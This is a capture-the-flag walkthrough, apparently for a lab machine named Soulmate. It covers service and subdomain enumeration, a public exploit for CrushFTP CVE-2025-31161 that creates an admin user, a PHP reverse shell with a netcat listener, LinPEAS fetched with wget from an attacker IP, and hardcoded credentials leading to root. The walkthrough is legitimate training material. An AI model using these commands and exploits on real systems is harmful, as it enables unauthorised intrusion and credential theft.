Enumeration
Starting with a service scan:
sudo nmap -sV 10.129.66.245 -oN firstscan.txt
Key Findings
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13
80/tcp open http nginx 1.18.0 (Ubuntu)
Only two ports open - SSH and HTTP. Let’s focus on the web service.
Web Enumeration
The website appears to be a dating platform allowing users to create accounts and upload images.
Initial Testing
Attempted to upload a PHP reverse shell disguised as an image, but discovered:
- Uploaded filenames are automatically changed by backend processing
- Images cannot be directly accessed
- Security measures are stripping potentially malicious content
Moving on to subdomain enumeration.
Subdomain Discovery
Using ffuf to discover subdomains:
ffuf -u http://soulmate.htb/ -H "Host: FUZZ.soulmate.htb" \
-w /usr/share/dirb/wordlists/big.txt -fw 4
Found: ftp.soulmate.htb
Added to /etc/hosts and navigated to the subdomain, which reveals CrushFTP WebInterface.
CrushFTP Authentication Bypass - CVE-2025-31161
The CrushFTP interface has no account creation option, only password reset functionality. Research reveals a recent authentication bypass vulnerability.
Exploitation
Cloning the public PoC:
git clone https://github.com/Immersive-Labs-Sec/CVE-2025-31161
cd CVE-2025-31161
Running the exploit to create a new administrative user:
python cve-2025-31161.py --target_host ftp.soulmate.htb \
--port 80 \
--target_user root \
--new_user pj \
--password pj131pj
Output:
[+] Preparing Payloads
[-] Warming up the target
[+] Sending Account Create Request
[!] User created successfully
[+] Exploit Complete you can now login with
[*] Username: pj
[*] Password: pj131pj.
? Successfully authenticated to CrushFTP interface!
Initial Access
User Enumeration
In the CrushFTP admin panel, found several users:
- ben: Multiple shares including
webProdfolder - jenna: One folder called
departments - crushadmin: No accessible shares
Getting a Shell
Changed ben’s password via the admin panel and uploaded a PHP reverse shell to the webProd folder.
Using PentestMonkey’s PHP reverse shell:
# Modified with attacker IP and port
# Uploaded to webProd folder
Setup netcat listener:
nc -lvnp 4444
Trigger the shell by navigating to http://soulmate.htb/pj131.php
Caught callback as www-data!
Privilege Escalation to User
Enumeration with LinPEAS
Transferred and executed LinPEAS on the target:
# On target
wget http://10.10.14.x/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
Key Finding - Erlang SSH Daemon
LinPEAS discovered an interesting Erlang process:
root 1146 /usr/local/lib/erlang_login/start.escript
Examining the script revealed hardcoded credentials:
cat /usr/local/lib/erlang_login/start.escript
Found credentials in the escript:
{user_passwords, [{"ben", "HouseH0ldings998"}]}
The script runs an SSH daemon on port 2222 (localhost only) with ben’s credentials.
SSH as Ben
Using password: HouseH0ldings998
User flag obtained:
2c68340e4b8a7f3966664368a6af78fd
Privilege Escalation to Root
Erlang SSH Daemon Exploitation
Based on the escript configuration, ben can SSH to the local Erlang daemon on port 2222:
ssh ben@localhost -p 2222
This drops us into an Erlang shell:
Eshell V15.2.5 (press Ctrl+G to abort, type help(). for help)
(ssh_runner@soulmate)1>
Vulnerability Research
Found an OffSec article outlining an Erlang SSH privilege escalation vulnerability with a GitHub PoC.
Downloaded and executed the exploit, successfully escalating to root!
Key Takeaways
- Subdomain enumeration revealed the CrushFTP installation
- CVE-2025-31161 allowed authentication bypass and admin access to CrushFTP
- Credential discovery in Erlang startup scripts provided user access
- Erlang SSH daemon vulnerability enabled privilege escalation to root
- Always check application-specific configuration files for hardcoded credentials
Tools Used
- nmap
- ffuf
- CVE-2025-31161 PoC
- LinPEAS
- PHP reverse shell
- Erlang SSH exploit